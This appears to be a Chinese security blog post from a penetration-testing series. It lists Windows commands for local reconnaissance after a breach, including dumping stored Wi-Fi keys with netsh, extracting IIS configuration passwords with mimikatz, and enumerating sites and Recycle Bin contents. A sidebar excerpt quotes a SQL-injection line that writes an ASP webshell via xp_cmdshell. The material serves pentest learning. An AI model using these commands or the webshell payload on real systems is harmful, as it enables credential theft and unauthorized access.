内网渗透之内网信息收集(七)

已于 2022-09-14 19:52:37 修改
阅读量1k 收藏 13
点赞数 13
分类专栏: # 内网渗透 网络安全 文章标签: 安全 windows
于 2022-07-07 11:35:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/125655789
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

本地信息收集

01IE浏览器代理信息查看

02Windows Wifi密码获取

03Windows hosts config

04Windows IIS config

05Windows回收站信息获取

06Chorme的密码和cookie获取

07Windows日志信息查看

内网渗透之Windows反弹shell(一)_不知名白帽的博客-CSDN博客

本地信息收集

01IE浏览器代理信息查看

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

02Windows Wifi密码获取

netsh wlan show profile

netsh wlan show profile name="ssid" KEY=clear

03Windows hosts config

windows7/windows2008/windows10等:

C:\Windows\System32\drivers\etc\hosts

Windows2003:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

04Windows IIS config

IIS6:

cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root

IIS7,8:

列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site

列出网站物理路径:%systemroot%\system32\inetsrc\appcmd.exe list vdir

Mimikatz读取IIS7配置文件密码:

mimikatz.exe privilege::debug log "iis::apphost

/in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit

05Windows回收站信息获取

目录路径在C:\%Recycle.Bin

$I开头的文件保存的是路径信息

$R开头的文件保存的是文件内容

06Chorme的密码和cookie获取

07Windows日志信息查看

不知名白帽
关注
专栏目录
内网渗透(十二)之内网信息收集-内网端口扫描和发现
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-09 876
通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等, 在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-08 596
上一篇文章中,我们讲述了如何手动的去收集本地信息,那么,在实战的环境下,二三十条的命令都需要我们一个一个手动的去敲得话,会显得很麻烦,而且很浪费时间,所以这就引出了本文我们要讲述的技术,将这二三十条的命令全部编写成一个自动化脚本,一次性自动收集本地信息。
如何使用reg命令修改注册表
baichuanxiaoove的博客
11-23 2190
 reg /?获取reg命令的用法 Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。   C:\Users\huweiguo>reg /?   REG Operation [Parameter List]     Operation  [ QUERY   | ADD    |
通过注册表禁用桌面鼠标右键等
weixin_30505225的博客
05-18 461
忽然发现快近一年不在这个博客上转载文章了,悔恨不已,近日在网上查到此文,特此转载。 通过注册表禁用桌面鼠标右键等[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRecentDocsMenu"=dword:00000001(隐藏开始->文档菜单)"NoRecentDo...
域账户信息导出脚本_内网信息收集
weixin_39523835的博客
12-01 251
心有猛虎,今天大雨还是屁颠屁颠跑去加了一个下午的班。把专家系统的方案做了一下,下周一要评审,基本上稳了。在做项目的过程中,我发现了很多理论和实际相差很大,但恰恰是搞理论的博士,领导着做项目的我们。如果理论与实际情况对不上,我说的是如果,上对下的指导,听上去就像是在满嘴跑火车,不得底下的人心。所以,摆低态度,从实际出发。一、手动收集信息最最最基本的命令,了解一下就行了,实战都要靠储备的油猴子脚本。1...
pyqt 把控制台信息显示到_内网渗透初识—信息收集
weixin_39638603的博客
11-24 149
进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备PS:文中提到的PowerSploit本机信息包括操作系统,当前用户权限,内网ip段,杀毒软件,端口开放情况,系统打的补丁,网络状况,共享文件夹等,如果是域内的主机的话,操作系统、补丁、运行的服务、杀软等一般是域管批量用脚本安装的。本机网络配置ipconfig /all:### 操作...
内网渗透内网信息收集(综合)
墨鱼菜鸡
09-10 528
目录 Metasploit内网信息收集 01msf反弹shell 02msf反弹shell 03通过shell关闭防火墙 04关闭杀毒软件 05打开并连接3389 06数据包抓取 07口令破解 普通用户提权 08other 09scraper 09winenum 10msf主机发现 11msf端口扫描 12服务扫描与查点 ...
内网渗透测试之信息收集.pdf
03-17
内网渗透测试的信息收集是渗透测试工作中极为关键的一步,它决定了后续渗透测试的方向和深度。信息收集通常分为手工信息收集和自动化信息收集,通过多种手段来获取目标内网的详细信息,以利于后续的攻击和渗透。 ...
内网渗透之域渗透.pdf
08-07
内网渗透和域渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...
CTF-综合测试(高难度)【超详细】
热门推荐
不知名白帽的博客
09-09 1万+
CTF-综合测试(高难度)【超详细】
DC-1靶机练习【超详细】
不知名白帽的博客
09-07 1万+
DC-1靶机练习【超详细】
对注册表项“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”的访问被拒绝。
十年一梦 荒唐半生
05-08 1万+
安装docker的时候一直报错: 对注册表项“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”的访问被拒绝。 在 Microsoft.Win32.RegistryKey.Win32Error(Int32 errorCode, String str) 在 Microsoft.Win32.RegistryKey.Creat...
jboss/CVE-2017-7504
不知名白帽的博客
06-23 2150
jboss/CVE-2017-7504漏洞复现。
注册表禁用计算机管理,解除封锁注册表被禁用的几种解决办法
weixin_33277243的博客
06-20 1860
解除封锁注册表被禁用的几种解决办法转载zc03222008-12-11 14:28:00©著作权文章分类电脑常识阅读数636https://blog.51cto.com/zc0322/118792现在网络病毒日益横行,网友们稍有不慎便会被恶意网站***,通常会修改我们的浏览器,然后再将注册表禁用,从而达到一打开网页就访问这些网站的目的;还有一种情况是计算机管理员为了保护计算机而设置注册表为禁用,这...
内网渗透内网信息收集(五)
不知名白帽的博客
07-06 1253
内网渗透内网信息收集(五)(01凭证获取工具、02密码hash、03mimikatz、04get-hashs)
weblogic(10.3.6)
不知名白帽的博客
06-20 1806
weblogic(10.3.6)
最详细的SQL注入相关的命令整理
eldn__的专栏
04-20 1256
1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';-- ? echo ^ >c:\mu.asp 2、 显示SQL系统版本: ? http://192.168
内网结构探测:域内信息收集关键步骤
本文主要探讨了域内网中的信息收集策略,特别是关于内网结构探测的重要性。作者bugcx在其博客中分享了如何在入侵内网时进行初步的信息搜集工作,以便了解网络布局和寻找潜在漏洞。首先,通过对网络设备如子网掩码、...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值